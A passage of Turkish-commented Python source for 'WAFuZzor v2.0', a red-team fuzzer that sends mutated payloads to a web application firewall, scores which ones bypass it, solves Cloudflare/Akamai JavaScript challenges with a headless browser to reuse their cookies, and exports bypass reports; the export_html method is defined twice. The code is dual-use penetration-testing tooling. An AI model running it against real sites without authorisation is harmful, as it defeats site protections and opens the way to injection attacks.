        # Normalize edilmiş hash — dinamik içerik farklılıklarını filtrele
        norm_hash = self._norm_hash(body)
        lower_body = body.lower()

        # Signal 1: Status farklı mı blocked'tan?
        if status != self.blocked.status and status not in [0, -1]:
            bypass_signals += 1
            reasons.append(f"Status değişti: {self.blocked.status} → {status}")

        # Signal 2: Body hash farklı mı blocked'tan? (normalize edilmiş karşılaştırma)
        if norm_hash != self._blocked_norm_hash and norm_hash != "":
            bypass_signals += 1
            reasons.append("Response body içeriği değişti (normalize edilmiş)")

        # Signal 3: Length delta > %20 — dinamik içerik toleransı ile
        if self.blocked.length > 0:
            tolerance = self._dynamic_length_tolerance(body)
            effective_len_diff = abs(length - self.blocked.length) - tolerance
            delta_pct = effective_len_diff / self.blocked.length if effective_len_diff > 0 else 0
            if delta_pct > 0.20:
                bypass_signals += 1
                reasons.append(f"Response length delta: %{delta_pct*100:.0f} (tolerans: {tolerance}B)")

        # Signal 4: Block keyword yok mu?
        block_kw_in_resp = any(kw in lower_body for kw in self.BLOCK_KEYWORDS)
        block_kw_in_blocked = any(kw in self.blocked.body_sample.lower() for kw in self.BLOCK_KEYWORDS)
        if block_kw_in_blocked and not block_kw_in_resp:
            bypass_signals += 1
            reasons.append("Bloklama keyword'ü response'ta yok")

        # Signal 5: Benign body'ye benzeme (normalize edilmiş difflib similarity)
        norm_body = self._normalize(body)
        if self._benign_norm_body and norm_body:
            similarity = difflib.SequenceMatcher(None, self._benign_norm_body[:300], norm_body[:300]).ratio()
            if similarity > 0.65:
                bypass_signals += 1
                reasons.append(f"Benign response'a benziyor (similarity: {similarity:.2f})")

        confidence = int((bypass_signals / total_signals) * 100)
        is_bypass = bypass_signals >= 2  # En az 2 sinyal gerekli

        return {
            "bypass":     is_bypass,
            "confidence": confidence,
            "reasons":    reasons,
            "status":     status,
            "length":     length,
            "signals":    f"{bypass_signals}/{total_signals}",
        }


# ---------------------------------------------------------------------------
# JS Challenge Handler (Playwright)
# ---------------------------------------------------------------------------
class JSChallengeHandler:
    """
    Cloudflare/Akamai gibi JS challenge sayfalarını geçmek için
    headless Chromium kullanır (Playwright gerektirir).
    Cookie ve User-Agent'ı kazandıktan sonra aiohttp'a devreder.
    """

    def __init__(self, url: str, proxy: Optional[str] = None, timeout: int = 30):
        self.url = url
        self.proxy = proxy
        self.timeout = timeout
        self._cookies: dict = {}
        self._ua: str = ""
        self._solved = False

    async def solve(self) -> bool:
        """
        Returns True if challenge solved successfully.
        """
        try:
            from playwright.async_api import async_playwright
        except ImportError:
            console.print("[danger]Playwright kurulu değil. 'pip install playwright && playwright install chromium'[/danger]")
            return False

        console.print("[warning]JS challenge tespit edildi, Playwright ile çözülüyor...[/warning]")

        async with async_playwright() as pw:
            launch_opts = {"headless": True}
            if self.proxy:
                launch_opts["proxy"] = {"server": self.proxy}

            browser = await pw.chromium.launch(**launch_opts)
            context = await browser.new_context()
            page = await context.new_page()

            try:
                await page.goto(self.url, timeout=self.timeout * 1000)
                # JS challenge'ın çözülmesini bekle (5-15 sn)
                await page.wait_for_load_state("networkidle", timeout=self.timeout * 1000)

                # Cookie'leri al
                cookies = await context.cookies()
                self._cookies = {c["name"]: c["value"] for c in cookies}
                self._ua = await page.evaluate("navigator.userAgent")
                self._solved = True
                console.print(f"[success]JS challenge çözüldü. {len(self._cookies)} cookie alındı.[/success]")
            except Exception as e:
                console.print(f"[danger]JS challenge çözülemedi: {e}[/danger]")
                self._solved = False
            finally:
                await browser.close()

        return self._solved

    @property
    def cookies(self) -> dict:
        return self._cookies

    @property
    def user_agent(self) -> str:
        return self._ua


# ---------------------------------------------------------------------------
# Ana Fuzzer
# ---------------------------------------------------------------------------
@dataclass
class FuzzResult:
    payload: str
    status: int
    length: int
    bypass: bool
    confidence: int
    reasons: list[str]
    signals: str


class WAFFuzzer:
    def __init__(self, url: str, method: str = "GET", data: Optional[str] = None,
                 headers: Optional[dict] = None, cookies: Optional[dict] = None,
                 proxy: Optional[str] = None, rate_limit: float = 0.0,
                 timeout: int = 10, verbose: bool = False, chunked: bool = False,
                 concurrency: int = 30, js_challenge: bool = False):

        self.url          = url
        self.method       = method.upper()
        self.data         = data
        self.headers      = headers or {}
        self.cookies      = cookies or {}
        self.proxy        = proxy
        self.rate_limit   = rate_limit
        self.timeout      = timeout
        self.verbose      = verbose
        self.chunked      = chunked
        self.concurrency  = concurrency
        self.js_challenge = js_challenge

        self.results: list[FuzzResult] = []
        self.benign_profile:  Optional[BaselineProfile] = None
        self.blocked_profile: Optional[BaselineProfile] = None
        self.waf_names:       list[tuple[str, int]] = []
        self.behavioral_info: dict = {}

        # Injection noktası
        if "FUZZ" not in self.url and self.method == "GET" and not self.data:
            sep = "&" if "?" in self.url else "?"
            self.target_url = f"{self.url}{sep}q=FUZZ"
        else:
            self.target_url = self.url

    def _inject(self, payload: str) -> tuple[str, Optional[str]]:
        safe_p = payload.replace(" ", "%20")
        target = self.target_url.replace("FUZZ", safe_p)
        body = self.data.replace("FUZZ", payload) if self.data else None
        return target, body

    async def _fetch_raw(self, session: aiohttp.ClientSession,
                         payload: str, _retry: int = 0) -> tuple[str, int, int, str, dict]:
        """
        Returns: (payload, status, len, body_text, response_headers)
        Retry: timeout veya 5xx hatasında max 3 kez tekrar dener, exponential backoff ile.
        """
        MAX_RETRIES = 3
        RETRY_ON_STATUS = {500, 502, 503, 504}  # geçici sunucu hataları

        target, body = self._inject(payload)

        req_headers = self.headers.copy()
        if "User-Agent" not in req_headers:
            req_headers["User-Agent"] = random.choice(USER_AGENTS)

        if self.rate_limit > 0:
            await asyncio.sleep(self.rate_limit)

        ssl_ctx = False if self.proxy else None
        is_chunked = self.chunked if self.method in ["POST", "PUT"] and body else None

        try:
            async with session.request(
                method=self.method,
                url=target,
                data=body,
                headers=req_headers,
                cookies=self.cookies,
                proxy=self.proxy,
                ssl=ssl_ctx,
                chunked=is_chunked,
                timeout=aiohttp.ClientTimeout(total=self.timeout),
                allow_redirects=True,
            ) as resp:
                raw = await resp.read()
                try:
                    body_text = raw.decode("utf-8", errors="replace")
                except Exception:
                    body_text = ""

                # 5xx hatasında retry
                if resp.status in RETRY_ON_STATUS and _retry < MAX_RETRIES:
                    backoff = 0.5 * (2 ** _retry)  # 0.5s, 1s, 2s
                    await asyncio.sleep(backoff)
                    return await self._fetch_raw(session, payload, _retry + 1)

                return payload, resp.status, len(raw), body_text, dict(resp.headers)

        except asyncio.TimeoutError:
            if _retry < MAX_RETRIES:
                backoff = 0.5 * (2 ** _retry)
                await asyncio.sleep(backoff)
                return await self._fetch_raw(session, payload, _retry + 1)
            return payload, 0, 0, "", {}

        except aiohttp.ServerDisconnectedError:
            if _retry < MAX_RETRIES:
                await asyncio.sleep(1.0)
                return await self._fetch_raw(session, payload, _retry + 1)
            return payload, -1, 0, "", {}

        except Exception:
            return payload, -1, 0, "", {}

    async def _make_session(self) -> aiohttp.ClientSession:
        connector = aiohttp.TCPConnector(
            limit_per_host=self.concurrency,
            ssl=False if self.proxy else None,
        )
        return aiohttp.ClientSession(connector=connector)

    # -----------------------------------------------------------------------
    # JS Challenge
    # -----------------------------------------------------------------------
    async def _handle_js_challenge(self):
        if not self.js_challenge:
            return
        handler = JSChallengeHandler(self.url, proxy=self.proxy, timeout=30)
        solved = await handler.solve()
        if solved:
            self.cookies.update(handler.cookies)
            if handler.user_agent:
                self.headers["User-Agent"] = handler.user_agent

    # -----------------------------------------------------------------------
    # Baseline Check
    # -----------------------------------------------------------------------
    async def run_baseline(self, benign_str: str, malicious_payload: str, behavioral: bool = True) -> bool:
        console.print("\n[primary]── Baseline Check ───────────────────────────────[/primary]")
        await self._handle_js_challenge()

        async with await self._make_session() as session:
            # 1. Benign istek
            _, b_status, b_len, b_body, b_headers = await self._fetch_raw(session, benign_str)
            if b_status not in [200, 301, 302, 304, 404]:
                console.print(f"[danger]Benign istek başarısız (HTTP {b_status}). Sunucu erişilebilir mi?[/danger]")
                return False

            self.benign_profile = BaselineProfile(
                status=b_status, length=b_len,
                body_hash=hashlib.sha256(b_body.encode(errors="replace")).hexdigest(),
                body_sample=b_body[:512],
                headers=b_headers,
            )
            console.print(f"[success]✔[/success] Benign  → HTTP {b_status} | {b_len} bytes")

            # WAF fingerprint (benign üzerinden header bilgisi al)
            self.waf_names = WAFFingerprinter.fingerprint(b_status, b_headers, b_body)

            # 2. Malicious baseline
            _, m_status, m_len, m_body, m_headers = await self._fetch_raw(session, malicious_payload)

            # WAF fingerprint — blocked response üzerinden tekrar (daha kesin)
            waf_from_block = WAFFingerprinter.fingerprint(m_status, m_headers, m_body)
            if waf_from_block:
                self.waf_names = waf_from_block  # blocked response daha güvenilir

            if m_status == b_status or m_status in [200, 301, 302]:
                console.print(
                    f"[danger]Baseline payload bloklanmadı (HTTP {m_status}). "
                    f"WAF yoksa veya payload zaten geçiyor olabilir. Devam etmek risklidir.[/danger]"
                )
                console.print("[warning]--force flag'i ile devam edebilirsiniz (false positive riski yüksek).[/warning]")
                return False

            self.blocked_profile = BaselineProfile(
                status=m_status, length=m_len,
                body_hash=hashlib.sha256(m_body.encode(errors="replace")).hexdigest(),
                body_sample=m_body[:512],
                headers=m_headers,
                blocked_keywords=[kw for kw in BypassDetector.BLOCK_KEYWORDS if kw in m_body.lower()],
            )
            console.print(f"[success]✔[/success] Malicious → HTTP {m_status} | {m_len} bytes (bloklandı)")



        if not behavioral:
            WAFFingerprinter.display(self.waf_names)
            return True
        # Davranışsal analiz — ek 6 probe göndererek WAF davranışını ölç
        console.print("[muted]Davranışsal analiz yapılıyor...[/muted]")
        async with await self._make_session() as probe_session:
            self.behavioral_info = await WAFFingerprinter.behavioral_probe(
                session=probe_session,
                base_url=self.target_url,
                headers=self.headers,
                cookies=self.cookies,
                proxy=self.proxy,
                timeout=self.timeout,
            )
        WAFFingerprinter.display([], behavioral=self.behavioral_info)

        return True

    # -----------------------------------------------------------------------
    # Fuzzing
    # -----------------------------------------------------------------------
    async def fuzz(self, mutations: list[str]):
        console.print(f"[primary]── Fuzzing Başlıyor: {len(mutations)} mutation ─────────────[/primary]\n")

        detector = BypassDetector(self.benign_profile, self.blocked_profile)
        semaphore = asyncio.Semaphore(self.concurrency)

        async with await self._make_session() as session:
            with Progress(
                SpinnerColumn(style="primary"),
                TextColumn("[primary]{task.description}"),
                BarColumn(style="secondary", complete_style="success"),
                TextColumn("[progress.percentage]{task.percentage:>3.0f}%"),
                TimeElapsedColumn(),
                console=console,
            ) as progress:
                task = progress.add_task("Fuzzing WAF...", total=len(mutations))

                async def _worker(payload: str):
                    async with semaphore:
                        if self.rate_limit > 0:
                            await asyncio.sleep(self.rate_limit)
                        pl, status, length, body, _ = await self._fetch_raw(session, payload)
                        analysis = detector.analyze(pl, status, length, body)
                        self._record(pl, status, length, analysis)
                        progress.update(task, advance=1)

                if self.rate_limit > 0:
                    for pl in mutations:
                        await _worker(pl)
                else:
                    await asyncio.gather(*[_worker(pl) for pl in mutations])

    def _record(self, payload: str, status: int, length: int, analysis: dict):
        if analysis is None:
            return  # 429 rate limit — atla
        r = FuzzResult(
            payload=payload,
            status=status,
            length=length,
            bypass=analysis["bypass"],
            confidence=analysis["confidence"],
            reasons=analysis["reasons"],
            signals=analysis["signals"],
        )
        self.results.append(r)

        if r.bypass:
            console.print(
                f"[success][BYPASS][/success] "
                f"HTTP {status} | {length}B | conf={r.confidence}% | signals={r.signals} | "
                f"{payload[:80]}"
            )
        elif self.verbose:
            console.print(
                f"[muted][BLOCK ][/muted]  "
                f"HTTP {status} | {length}B | {payload[:80]}"
            )

    # -----------------------------------------------------------------------
    # Rapor
    # -----------------------------------------------------------------------
    def display_report(self):
        bypasses = [r for r in self.results if r.bypass]
        errors   = [r for r in self.results if r.status in [0, -1]]

        console.print()
        console.print(Panel(
            f"Toplam mutation: [primary]{len(self.results)}[/primary] | "
            f"Bypass: [success]{len(bypasses)}[/success] | "
            f"Error/Timeout: [danger]{len(errors)}[/danger]",
            title="[primary]Sonuç Özeti[/primary]", border_style="secondary"
        ))

        if not bypasses:
            console.print("[success]✔ Hiçbir payload WAF'ı bypass edemedi.[/success]")
            return

        console.print(f"\n[warning]⚠ {len(bypasses)} başarılı bypass tespit edildi![/warning]\n")

        table = Table(show_header=True, header_style="primary",
                      border_style="secondary", box=box.ROUNDED)
        table.add_column("HTTP", width=6, justify="center")
        table.add_column("Bytes", width=8, justify="right")
        table.add_column("Conf%", width=7, justify="center")
        table.add_column("Signals", width=9, justify="center")
        table.add_column("Payload", min_width=40)
        table.add_column("Reasons")

        for r in sorted(bypasses, key=lambda x: x.confidence, reverse=True):
            table.add_row(
                str(r.status),
                str(r.length),
                f"{r.confidence}%",
                r.signals,
                r.payload[:80],
                ", ".join(r.reasons[:2]),
            )

        console.print(table)

    def export_json(self, path: str):
        bypasses = [
            {
                "payload":    r.payload,
                "status":     r.status,
                "length":     r.length,
                "confidence": r.confidence,
                "signals":    r.signals,
                "reasons":    r.reasons,
            }
            for r in self.results if r.bypass
        ]
        with open(path, "w", encoding="utf-8") as f:
            json.dump({"waf_detected": [n for n, _ in self.waf_names],
                       "total_mutations": len(self.results),
                       "bypasses": bypasses}, f, indent=2, ensure_ascii=False)
        console.print(f"\n[success]✔[/success] {len(bypasses)} bypass → {path}")

    def export_txt(self, path: str):
        bypasses = [r for r in self.results if r.bypass]
        with open(path, "w", encoding="utf-8") as f:
            for r in bypasses:
                f.write(r.payload + "\n")
        console.print(f"[success]✔[/success] Payload listesi → {path}")

    def export_html(self, path: str):
        """Bypass sonuçlarını güzel bir HTML rapora yazar."""
        import html as html_mod
        from datetime import datetime

        bypasses = [r for r in self.results if r.bypass]
        total    = len(self.results)
        waf_str  = ", ".join(n for n, _ in self.waf_names) if self.waf_names else "Tespit edilemedi"
        target   = self.url
        now      = datetime.now().strftime("%Y-%m-%d %H:%M:%S")

        # Davranışsal bilgiler
        beh = self.behavioral_info
        beh_block_rate  = f"{beh.get('block_rate', 0)*100:.0f}%"
        beh_block_ms    = f"{beh.get('avg_block_time_ms', 0):.0f}ms"
        beh_pass_ms     = f"{beh.get('avg_pass_time_ms', 0):.0f}ms"
        beh_ratelimit   = "✅ Evet" if beh.get("rate_limit_detected") else "❌ Hayır"
        beh_learning    = "⚠️ Şüpheli" if beh.get("learning_mode_suspected") else "✅ Normal"
        beh_notes_html  = "".join(f"<li>{html_mod.escape(n)}</li>" for n in beh.get("notes", []))

        # Bypass satırları
        rows_html = ""
        for r in bypasses:
            conf_color = "#22c55e" if r.confidence >= 80 else "#f59e0b" if r.confidence >= 60 else "#ef4444"
            payload_esc = html_mod.escape(r.payload)
            reasons_esc = html_mod.escape(", ".join(r.reasons))
            rows_html += f"""
            <tr>
                <td><span class="badge" style="background:#1e40af">{r.status}</span></td>
                <td>{r.length}</td>
                <td><span class="badge" style="background:{conf_color}">{r.confidence}%</span></td>
                <td>{r.signals}</td>
                <td class="payload-cell" title="{payload_esc}">{payload_esc[:100]}{'...' if len(r.payload) > 100 else ''}</td>
                <td>{reasons_esc}</td>
            </tr>"""

        html_content = f"""<!DOCTYPE html>
<html lang="tr">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>WAFuZzor — Rapor</title>
<style>
  :root {{
    --bg: #0f172a; --card: #1e293b; --border: #334155;
    --text: #e2e8f0; --muted: #94a3b8; --accent: #38bdf8;
    --green: #22c55e; --red: #ef4444; --yellow: #f59e0b;
  }}
  * {{ box-sizing: border-box; margin: 0; padding: 0; }}
  body {{ background: var(--bg); color: var(--text); font-family: 'Segoe UI', system-ui, sans-serif; padding: 2rem; }}
  h1 {{ color: var(--accent); font-size: 1.8rem; margin-bottom: 0.25rem; }}
  .subtitle {{ color: var(--muted); font-size: 0.9rem; margin-bottom: 2rem; }}
  .grid {{ display: grid; grid-template-columns: repeat(auto-fit, minmax(180px, 1fr)); gap: 1rem; margin-bottom: 2rem; }}
  .stat-card {{ background: var(--card); border: 1px solid var(--border); border-radius: 12px; padding: 1.25rem; }}
  .stat-card .label {{ color: var(--muted); font-size: 0.75rem; text-transform: uppercase; letter-spacing: 0.05em; }}
  .stat-card .value {{ font-size: 1.8rem; font-weight: 700; margin-top: 0.25rem; }}
  .stat-card .value.green {{ color: var(--green); }}
  .stat-card .value.red {{ color: var(--red); }}
  .stat-card .value.yellow {{ color: var(--yellow); }}
  .section {{ background: var(--card); border: 1px solid var(--border); border-radius: 12px; padding: 1.5rem; margin-bottom: 1.5rem; }}
  .section h2 {{ color: var(--accent); font-size: 1rem; margin-bottom: 1rem; border-bottom: 1px solid var(--border); padding-bottom: 0.5rem; }}
  table {{ width: 100%; border-collapse: collapse; font-size: 0.85rem; }}
  th {{ background: #0f172a; color: var(--muted); text-align: left; padding: 0.6rem 0.75rem; font-size: 0.75rem; text-transform: uppercase; letter-spacing: 0.05em; }}
  td {{ padding: 0.6rem 0.75rem; border-bottom: 1px solid var(--border); vertical-align: top; }}
  tr:last-child td {{ border-bottom: none; }}
  tr:hover td {{ background: rgba(56,189,248,0.04); }}
  .badge {{ display: inline-block; padding: 0.15rem 0.5rem; border-radius: 999px; font-size: 0.75rem; font-weight: 600; color: #fff; }}
  .payload-cell {{ font-family: 'Consolas', monospace; font-size: 0.8rem; color: #fbbf24; word-break: break-all; max-width: 400px; }}
  .beh-grid {{ display: grid; grid-template-columns: repeat(auto-fit, minmax(140px, 1fr)); gap: 0.75rem; }}
  .beh-item {{ background: #0f172a; border-radius: 8px; padding: 0.75rem; }}
  .beh-item .k {{ color: var(--muted); font-size: 0.75rem; margin-bottom: 0.25rem; }}
  .beh-item .v {{ font-weight: 600; font-size: 0.95rem; }}
  .notes-list {{ margin-top: 0.75rem; padding-left: 1.25rem; color: var(--yellow); font-size: 0.85rem; }}
  .no-bypass {{ text-align: center; color: var(--muted); padding: 2rem; }}
  .footer {{ text-align: center; color: var(--muted); font-size: 0.75rem; margin-top: 2rem; }}
</style>
</head>
<body>

<h1>🛡️ WAFuZzor — Pentest Raporu</h1>
<p class="subtitle">Oluşturulma: {now} &nbsp;|&nbsp; Hedef: <code>{html_mod.escape(target)}</code> &nbsp;|&nbsp; WAF: {html_mod.escape(waf_str)}</p>

<div class="grid">
  <div class="stat-card">
    <div class="label">Toplam Mutation</div>
    <div class="value">{total}</div>
  </div>
  <div class="stat-card">
    <div class="label">Bypass Tespit</div>
    <div class="value {'red' if len(bypasses) > 0 else 'green'}">{len(bypasses)}</div>
  </div>
  <div class="stat-card">
    <div class="label">Bypass Oranı</div>
    <div class="value {'red' if len(bypasses) > 0 else 'green'}">{len(bypasses)/max(total,1)*100:.1f}%</div>
  </div>
  <div class="stat-card">
    <div class="label">WAF</div>
    <div class="value" style="font-size:1rem; padding-top:0.4rem">{html_mod.escape(waf_str.split(',')[0] if waf_str else '—')}</div>
  </div>
</div>

<div class="section">
  <h2>🔬 Davranışsal WAF Analizi</h2>
  <div class="beh-grid">
    <div class="beh-item"><div class="k">Blok Oranı</div><div class="v">{beh_block_rate}</div></div>
    <div class="beh-item"><div class="k">Ort. Blok Süresi</div><div class="v">{beh_block_ms}</div></div>
    <div class="beh-item"><div class="k">Ort. Geçiş Süresi</div><div class="v">{beh_pass_ms}</div></div>
    <div class="beh-item"><div class="k">Rate Limiting</div><div class="v">{beh_ratelimit}</div></div>
    <div class="beh-item"><div class="k">Learning Mode</div><div class="v">{beh_learning}</div></div>
  </div>
  {'<ul class="notes-list">' + beh_notes_html + '</ul>' if beh_notes_html else ''}
</div>

<div class="section">
  <h2>✅ Bypass Sonuçları ({len(bypasses)} adet)</h2>
  {'<table><thead><tr><th>HTTP</th><th>Bytes</th><th>Conf%</th><th>Sinyaller</th><th>Payload</th><th>Nedenler</th></tr></thead><tbody>' + rows_html + '</tbody></table>' if bypasses else '<div class="no-bypass">🎉 Hiç bypass tespit edilmedi</div>'}
</div>

<div class="footer">WAFuZzor v2.0 — github.com/Pavlushkax/WAFuZzor-v2.0 — Yalnızca yetkili ortamlarda kullanın.</div>

</body>
</html>"""

        with open(path, "w", encoding="utf-8") as f:
            f.write(html_content)
        console.print(f"[success]✔[/success] HTML rapor → {path}")

    def export_html(self, path: str):
        """Tüm sonuçları güzel bir HTML raporuna yazar."""
        import html as html_mod
        from datetime import datetime

        bypasses = [r for r in self.results if r.bypass]
        errors   = [r for r in self.results if r.status in [0, -1]]
        blocked  = [r for r in self.results if not r.bypass and r.status not in [0, -1]]
        total    = len(self.results)

        waf_label = ", ".join(n for n, _ in self.waf_names[:3]) if self.waf_names else "Tespit edilemedi"
        ts        = datetime.now().strftime("%Y-%m-%d %H:%M:%S")

        # Behavioral probe tablosu
        beh_html = ""
        beh = getattr(self, "behavioral_data", None)
        if beh and beh.get("probe_results"):
            rows = ""
            for probe, res in beh["probe_results"].items():
                status_class = "blocked" if res.get("blocked") else "bypass"
                label        = "BLOK" if res.get("blocked") else "GEÇTİ"
                rows += f"""<tr>
                    <td><code>{html_mod.escape(probe)}</code></td>
                    <td><span class="badge {status_class}">{label}</span></td>
                    <td>{res.get('status','?')}</td>
                    <td>{res.get('time_ms','?')} ms</td>
                </tr>"""
            notes_html = "".join(f"<li>{html_mod.escape(n)}</li>" for n in beh.get("notes", []))
            beh_html = f"""
            <section>
                <h2>🔬 Davranışsal WAF Analizi</h2>
                <div class="stat-row">
                    <div class="stat-box">
                        <div class="stat-num" style="color:#f59e0b">%{int(beh['block_rate']*100)}</div>
                        <div class="stat-label">Blok Oranı</div>
                    </div>
                    <div class="stat-box">
                        <div class="stat-num" style="color:{'#ef4444' if beh['challenge_detected'] else '#22c55e'}">
                            {'EVET' if beh['challenge_detected'] else 'HAYIR'}
                        </div>
                        <div class="stat-label">JS Challenge</div>
                    </div>
                    <div class="stat-box">
                        <div class="stat-num" style="color:{'#ef4444' if beh['timing_anomaly'] else '#22c55e'}">
                            {'EVET' if beh['timing_anomaly'] else 'HAYIR'}
                        </div>
                        <div class="stat-label">Timing Anomalisi</div>
                    </div>
                </div>
                {'<ul class="notes">' + notes_html + '</ul>' if notes_html else ''}
                <table>
                    <thead><tr><th>Probe</th><th>Sonuç</th><th>HTTP</th><th>Süre</th></tr></thead>
                    <tbody>{rows}</tbody>
                </table>
            </section>"""

        # Bypass satırları
        bypass_rows = ""
        for r in sorted(bypasses, key=lambda x: x.confidence, reverse=True):
            reasons_html = "<br>".join(html_mod.escape(reason) for reason in r.reasons)
            bypass_rows += f"""<tr>
                <td>{r.status}</td>
                <td>{r.length}</td>
                <td><span class="conf-bar">
                    <span class="conf-fill" style="width:{r.confidence}%"></span>
                    <span class="conf-text">{r.confidence}%</span>
                </span></td>
                <td>{html_mod.escape(r.signals)}</td>
                <td><code class="payload">{html_mod.escape(r.payload[:120])}</code></td>
                <td class="reasons">{reasons_html}</td>
            </tr>"""

        html_content = f"""<!DOCTYPE html>
<html lang="tr">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>WAFuZzor Raporu — {html_mod.escape(self.url)}</title>
    <style>
        :root {{
            --bg: #0f1117; --surface: #1a1d27; --surface2: #242736;
            --border: #2e3347; --text: #e2e8f0; --muted: #64748b;
            --green: #22c55e; --red: #ef4444; --yellow: #f59e0b;
            --blue: #38bdf8; --purple: #a78bfa;
        }}
        * {{ box-sizing: border-box; margin: 0; padding: 0; }}
        body {{ background: var(--bg); color: var(--text); font-family: 'Segoe UI', system-ui, sans-serif; padding: 2rem; }}
        h1 {{ font-size: 1.8rem; margin-bottom: 0.25rem; color: var(--blue); }}
        h2 {{ font-size: 1.2rem; margin: 2rem 0 1rem; color: var(--purple); border-bottom: 1px solid var(--border); padding-bottom: 0.5rem; }}
        .meta {{ color: var(--muted); font-size: 0.85rem; margin-bottom: 2rem; }}
        .meta span {{ margin-right: 1.5rem; }}
        .stat-row {{ display: flex; gap: 1rem; margin-bottom: 1.5rem; flex-wrap: wrap; }}
        .stat-box {{ background: var(--surface); border: 1px solid var(--border); border-radius: 10px; padding: 1.2rem 2rem; text-align: center; min-width: 130px; }}
        .stat-num {{ font-size: 2rem; font-weight: 700; }}
        .stat-label {{ font-size: 0.78rem; color: var(--muted); margin-top: 0.3rem; text-transform: uppercase; letter-spacing: 0.05em; }}
        table {{ width: 100%; border-collapse: collapse; background: var(--surface); border-radius: 10px; overflow: hidden; margin-bottom: 1.5rem; }}
        th {{ background: var(--surface2); padding: 0.75rem 1rem; text-align: left; font-size: 0.82rem; color: var(--muted); text-transform: uppercase; letter-spacing: 0.04em; }}
        td {{ padding: 0.75rem 1rem; border-top: 1px solid var(--border); vertical-align: top; font-size: 0.88rem; }}
        tr:hover td {{ background: var(--surface2); }}
        code {{ font-family: 'Cascadia Code', 'Fira Mono', monospace; font-size: 0.82rem; }}
        code.payload {{ color: var(--yellow); word-break: break-all; }}
        .badge {{ display: inline-block; padding: 0.2rem 0.6rem; border-radius: 99px; font-size: 0.75rem; font-weight: 600; }}
        .badge.bypass {{ background: #14532d; color: var(--green); }}
        .badge.blocked {{ background: #450a0a; color: var(--red); }}
        .conf-bar {{ display: flex; align-items: center; gap: 0.5rem; }}
        .conf-fill {{ height: 8px; border-radius: 4px; background: linear-gradient(90deg, var(--green), var(--yellow)); min-width: 4px; }}
        .conf-text {{ font-size: 0.8rem; color: var(--muted); white-space: nowrap; }}
        .reasons {{ color: var(--muted); font-size: 0.82rem; }}
        .notes {{ margin: 0.5rem 0 1rem 1.2rem; color: var(--muted); font-size: 0.85rem; }}
        .notes li {{ margin-bottom: 0.3rem; }}
        section {{ margin-bottom: 2.5rem; }}
        .waf-badge {{ display: inline-block; background: var(--surface2); border: 1px solid var(--border); border-radius: 6px; padding: 0.3rem 0.8rem; margin-right: 0.5rem; font-size: 0.85rem; color: var(--blue); }}
        footer {{ margin-top: 3rem; color: var(--muted); font-size: 0.78rem; border-top: 1px solid var(--border); padding-top: 1rem; }}
    </style>
</head>
<body>
    <h1>🛡️ WAFuZzor Raporu</h1>
    <div class="meta">
        <span>🎯 <strong>{html_mod.escape(self.url)}</strong></span>
        <span>🕐 {ts}</span>
        <span>🔍 WAF: {html_mod.escape(waf_label)}</span>
    </div>

    <section>
        <h2>📊 Özet</h2>
        <div class="stat-row">
            <div class="stat-box">
                <div class="stat-num" style="color:var(--blue)">{total}</div>
                <div class="stat-label">Toplam Mutation</div>
            </div>
            <div class="stat-box">
                <div class="stat-num" style="color:{'var(--red)' if bypasses else 'var(--green)'}">
                    {len(bypasses)}
                </div>
                <div class="stat-label">Bypass</div>
            </div>
            <div class="stat-box">
                <div class="stat-num" style="color:var(--muted)">{len(blocked)}</div>
                <div class="stat-label">Bloklandı</div>
            </div>
            <div class="stat-box">
                <div class="stat-num" style="color:var(--yellow)">{len(errors)}</div>
                <div class="stat-label">Hata/Timeout</div>
            </div>
        </div>

        <div>WAF Tespiti:
        {"".join(f'<span class="waf-badge">{html_mod.escape(n)} ({c}%)</span>' for n, c in self.waf_names[:5])}
        </div>
    </section>

    {beh_html}

    <section>
        <h2>🚨 Bypass Edilen Payload'lar ({len(bypasses)})</h2>
        {'<p style="color:var(--green)">✔ Hiçbir payload WAF\'ı bypass edemedi.</p>' if not bypasses else f"""
        <table>
            <thead>
                <tr>
                    <th>HTTP</th><th>Bytes</th><th>Güven</th>
                    <th>Sinyaller</th><th>Payload</th><th>Nedenler</th>
                </tr>
            </thead>
            <tbody>{bypass_rows}</tbody>
        </table>"""}
    </section>

    <footer>
        WAFuZzor v2.0 — Red Team Edition &nbsp;|&nbsp;
        Yalnızca yetkili ortamlarda kullanın &nbsp;|&nbsp;
        <a href="https://github.com/Pavlushkax/WAFuZzor-v2.0" style="color:var(--blue)">GitHub</a>
    </footer>
</body>
</html>"""

        with open(path, "w", encoding="utf-8") as f:
            f.write(html_content)
        console.print(f"[success]✔[/success] HTML rapor → {path}")


# ---------------------------------------------------------------------------
# CLI
# ---------------------------------------------------------------------------
BANNER = r"""[primary]
 __      __   _   _____   ___                      
 \ \    / /  /_\ | __\ \ / / |_ _ __ __ _ _______ _ 
  \ \/\/ /  / _ \| _| \ V /| | | '_ \ _` |_ / _` | ' \
   \_/\_/  /_/ \_\_|   \_/ |_|_|_.__/\__,_/__\__,_|_||_|
[/primary][secondary]  Red Team Edition v2.0 — Yalnızca yetkili ortamlarda kullanın.[/secondary]
"""

async def main():
    parser = argparse.ArgumentParser(
        description="WAF Fuzzer v2 — Red Team Edition",
        epilog="Yalnızca yetkili/izinli lab ortamlarında kullanılmalıdır.",
        formatter_class=argparse.RawDescriptionHelpFormatter,
    )

    # Hedef
    parser.add_argument("-u", "--url", required=True,
                        help="Hedef URL. 'FUZZ' ile enjeksiyon noktası belirlenir.")

    # Payload
    pg = parser.add_mutually_exclusive_group(required=True)
    pg.add_argument("-p", "--payload",
                    help="Tek baseline payload (ör: '<script>alert(1)</script>')")
    pg.add_argument("-w", "--wordlist",
                    help="Payload wordlist dosyası (.txt, satır başı yorum için #)")

    # HTTP ayarları
    parser.add_argument("-X", "--method", default="GET",
                        help="HTTP metodu (varsayılan: GET)")
    parser.add_argument("-d", "--data",
                        help="POST/PUT body. 'FUZZ' ile enjeksiyon noktası belirlenir.")
    parser.add_argument("-H", "--header", action="append",
                        help="Header (tekrarlanabilir): 'Authorization: Bearer TOKEN'")
    parser.add_argument("-c", "--cookies",
                        help="Cookie string: 'session=abc; token=xyz'")
    parser.add_argument("--proxy",
                        help="Proxy URL: http://127.0.0.1:8080 (Burp Suite için)")

    # Mutation
    parser.add_argument("--context",
                        choices=["general", "sqli", "xss", "cmdi", "path", "ssti"],
                        default="general",
                        help="Mutation context (varsayılan: general)")
    parser.add_argument("--no-mutate", action="store_true",
